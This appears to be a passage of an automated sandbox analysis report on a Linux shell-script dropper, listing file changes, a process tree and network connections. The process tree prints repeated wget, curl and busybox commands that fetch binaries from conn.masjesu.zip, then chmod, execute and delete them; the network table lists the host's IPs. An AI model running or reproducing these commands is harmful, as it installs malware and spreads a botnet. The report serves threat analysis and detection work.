File opened for modification /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /usr/bin/curl N/A
File opened for modification /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /usr/bin/curl N/A
File opened for modification /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /usr/bin/curl N/A
File opened for modification /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /usr/bin/curl N/A
File opened for modification /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /usr/bin/curl N/A
File opened for modification /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /usr/bin/curl N/A
File opened for modification /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /usr/bin/curl N/A
File opened for modification /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /usr/bin/curl N/A
File opened for modification /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /usr/bin/curl N/A
File opened for modification /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /usr/bin/curl N/A

Processes

/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/chmod

[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/rm

[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/chmod

[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m

[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/rm

[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/chmod

[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX

[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/rm

[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/chmod

[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL

[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/rm

[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/chmod

[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh

[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/rm

[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/chmod

[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y

[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/rm

[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/chmod

[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG

[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/rm

[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/chmod

[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d

[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/rm

[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/chmod

[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s

[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/rm

[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/chmod

[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t

[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/rm

[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/chmod

[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8

[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/rm

[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/chmod

[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv

[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/rm

[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/chmod

[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx

[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/rm

[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/chmod

[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM

[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/rm

[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/chmod

[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/rm

[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/chmod

[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m

[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/rm

[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/chmod

[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX

[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/rm

[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/chmod

[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL

[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/rm

[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/chmod

[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh

[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/rm

[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/chmod

[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y

[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/rm

[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/chmod

[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG

[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/rm

[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/chmod

[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d

[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/rm

[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/chmod

[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s

[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/rm

[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/chmod

[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t

[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/rm

[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/chmod

[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8

[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/rm

[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/chmod

[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv

[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/rm

[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/chmod

[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx

[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/rm

[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/chmod

[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM

[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/rm

[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
